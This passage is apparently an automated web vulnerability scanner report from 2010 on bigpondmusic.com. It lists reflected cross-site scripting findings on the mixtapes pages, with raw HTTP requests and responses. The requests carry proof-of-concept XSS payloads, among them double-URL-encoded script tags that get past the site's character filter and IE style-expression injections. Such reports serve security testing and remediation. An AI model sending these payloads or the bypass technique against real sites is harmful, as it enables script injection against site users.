Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes/celebrity56e88'%3bff2886175b1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87824


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
ing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes';
   s.prop4 = 'celebrity56e88';ff2886175b1';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.309. http://bigpondmusic.com/mixtapes/celebrity [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/celebrity

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3afb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d9da0d1c8e was submitted in the REST URL parameter 2. This input was echoed as 3afb5"><script>alert(1)</script>3d9da0d1c8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mixtapes/celebrity3afb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d9da0d1c8e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/celebrity3afb5"><script>alert(1)</script>3d9da0d1c8e" />
...[SNIP]...

2.310. http://bigpondmusic.com/mixtapes/celebrity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/celebrity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e414f"style%3d"x%3aexpression(alert(1))"e32a6bfbe6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e414f"style="x:expression(alert(1))"e32a6bfbe6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /mixtapes/celebrity?e414f"style%3d"x%3aexpression(alert(1))"e32a6bfbe6a=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 101227


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Browse BPM Mixtapes - BigPon
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/celebrity?e414f"style="x:expression(alert(1))"e32a6bfbe6a=1" />
...[SNIP]...

2.311. http://bigpondmusic.com/mixtapes/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c5c6'%3b8948a3e7d4a was submitted in the REST URL parameter 1. This input was echoed as 1c5c6';8948a3e7d4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes1c5c6'%3b8948a3e7d4a/create HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88034


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes1c5c6';8948a3e7d4a';
   s.prop4 = 'create';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.312. http://bigpondmusic.com/mixtapes/create [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/create

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcd5c1c9973 was submitted in the REST URL parameter 1. This input was echoed as 39a87"><script>alert(1)</script>dcd5c1c9973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mixtapes39a87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcd5c1c9973/create HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes39a87"><script>alert(1)</script>dcd5c1c9973/create" />
...[SNIP]...

2.313. http://bigpondmusic.com/mixtapes/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55f85'%3bf080df37b37 was submitted in the REST URL parameter 2. This input was echoed as 55f85';f080df37b37 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes/create55f85'%3bf080df37b37 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
esting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes';
   s.prop4 = 'create55f85';f080df37b37';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.314. http://bigpondmusic.com/mixtapes/create [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/create

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93a25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e487d00b0080 was submitted in the REST URL parameter 2. This input was echoed as 93a25"><script>alert(1)</script>487d00b0080 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mixtapes/create93a25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e487d00b0080 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88556


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/create93a25"><script>alert(1)</script>487d00b0080" />
...[SNIP]...

2.315. http://bigpondmusic.com/mixtapes/create [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/create

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a106"style%3d"x%3aexpression(alert(1))"d3372b08d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a106"style="x:expression(alert(1))"d3372b08d8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /mixtapes/create?4a106"style%3d"x%3aexpression(alert(1))"d3372b08d8b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 66651


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Login - BigPond Music MP3 Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/create?4a106"style="x:expression(alert(1))"d3372b08d8b=1" />
...[SNIP]...

2.316. http://bigpondmusic.com/mixtapes/favourites [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/favourites

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405c6'%3b5b8badcedb6 was submitted in the REST URL parameter 1. This input was echoed as 405c6';5b8badcedb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes405c6'%3b5b8badcedb6/favourites HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87880


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes405c6';5b8badcedb6';
   s.prop4 = 'favourites';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.pro
...[SNIP]...

2.317. http://bigpondmusic.com/mixtapes/favourites [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/favourites

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3671a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e488f4810798 was submitted in the REST URL parameter 1. This input was echoed as 3671a"><script>alert(1)</script>488f4810798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mixtapes3671a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e488f4810798/favourites HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88352


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes3671a"><script>alert(1)</script>488f4810798/favourites" />
...[SNIP]...

2.318. http://bigpondmusic.com/mixtapes/favourites [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /mixtapes/favourites

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45522'%3bc65a754ba24 was submitted in the REST URL parameter 2. This input was echoed as 45522';c65a754ba24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mixtapes/favourites45522'%3bc65a754ba24 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87767


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
ng.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'mixtapes';
   s.prop4 = 'favourites45522';c65a754ba24';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.319. http://bigpondmusic.com/mixtapes/favourites [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /mixtapes/favourites

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e963876f3728 was submitted in the REST URL parameter 2. This input was echoed as 90474"><script>alert(1)</script>963876f3728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mixtapes/favourites90474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e963876f3728 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
